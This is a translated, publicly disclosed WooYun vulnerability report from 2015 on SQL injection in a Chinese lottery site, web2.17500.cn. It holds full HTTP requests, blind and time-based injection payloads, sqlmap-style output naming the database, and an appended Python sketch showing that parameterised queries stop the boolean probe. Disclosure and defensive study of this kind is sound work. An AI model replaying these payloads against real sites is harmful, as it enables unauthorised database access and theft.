Vulnerability Summary

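Bug ID: wooyun-2015-0113093

Vulnerability title: Bundle of SQL injections on a 乐彩网 site

Vendor: 乐彩网

Author: 紫霞仙子

Submitted: 2015-05-11 17:05

Fixed: 2015-06-30 08:14

Disclosed: 2015-06-30 08:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]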



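Vulnerability Details

Disclosure status:

2015-05-11: Details sent to the vendor; awaiting vendor handling
2015-05-16: Vendor confirmed; details disclosed to the vendor only
2015-05-26: Details disclosed to core white hats and relevant domain experts
2015-06-05: Details disclosed to regular white hats
2015-06-15: Details disclosed to intern white hats
2015-06-30: Details disclosed to the public

Brief description:

233

Detailed description:

1. Parameters q1, q2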
POST /3d/3Dallresult.php HTTP/1.1
Content-Length: 505
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=2015093
2. Parameter issue
GET /3d/p3_showpub.php?issue=if(now()%3dsysdate()%2csleep(0)%2c0) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
payload:
issue='XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
issue='XOR(if(now()%3dsysdate()%2csleep(3)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
3. Parameter id
GET /800/nr2.php?id=47881%20AND%203*2*1%3d6%20AND%20370%3d370 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
payload:
id=47881%20AND%203*2*1%3d6%20AND%20370%3d370
id=47881%20AND%203*2*2%3d6%20AND%20370%3d370

Proof of vulnerability:

Parameter: q2 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=2015093' AND 9465=9465 AND 'FRxL'='FRxL
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=-8178' OR 7729=SLEEP(5) AND 'AMmE'='AMmE
---
back-end DBMS: MySQL 5.0.11
available databases [1]:
[*] cnlot2004

Fix:

~~Filtering cannot solve the problem!

Copyright notice: when reposting, please credit the source 紫霞仙子@乌云
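As an added example (not part of the original report and not the vendor's code), the sketch below shows why the boolean probe from the proof section works against a concatenated query and stops working once q1 and q2 are bound as parameters. The table, column names and query shape are assumptions, and an in-memory SQLite database stands in for the MySQL back end.

```python
import sqlite3

# Constructed stand-in data: the table and column names are hypothetical,
# and SQLite replaces the MySQL back end named in the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE results (issue TEXT, numbers TEXT)")
    db.executemany("INSERT INTO results VALUES (?, ?)",
                   [("2015092", "1 2 3"), ("2015093", "4 5 6")])
    return db

def lookup_concatenated(db, q1, q2):
    """'Before' form: request values are pasted into the SQL text."""
    sql = ("SELECT issue FROM results WHERE issue >= '" + q1 +
           "' AND issue <= '" + q2 + "' ORDER BY issue")
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, q1, q2):
    """Hardened form: values are bound parameters and are never parsed as SQL."""
    sql = ("SELECT issue FROM results WHERE issue >= ? AND issue <= ? "
           "ORDER BY issue")
    return [row[0] for row in db.execute(sql, (q1, q2))]

# q2 value from the proof section, and a constructed twin whose injected
# condition is false (same idea as the 3*2*1=6 / 3*2*2=6 pair for id).
TRUE_PROBE = "2015093' AND 9465=9465 AND 'FRxL'='FRxL"
FALSE_PROBE = "2015093' AND 9465=9466 AND 'FRxL'='FRxL"

def answers_differ(lookup, db):
    """True when the result set depends on the injected condition,
    i.e. the endpoint answers attacker-chosen yes/no questions."""
    return (lookup(db, "2015092", TRUE_PROBE)
            != lookup(db, "2015092", FALSE_PROBE))

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean:",
          answers_differ(lookup_concatenated, db))
    print("bound query leaks a boolean:",
          answers_differ(lookup_bound, db))
```

The same true/false pair can be kept as a regression test after the fix: a patched endpoint must return identical results for both values.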


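Vulnerability Response

Vendor response:

Severity: Low

Vulnerability Rank: 3

Confirmed: 2015-05-16 08:12

Vendor reply:

Thank you for the vulnerability information; we will look into it carefully.

Latest status:

None


Vulnerability comments:

Comments

  1. 2015-05-11 18:25 | 紫霞仙子 ( Regular white hat | Rank:2027 Vulnerabilities:279 | Improving every day !!!)

    Hoping for a wristband!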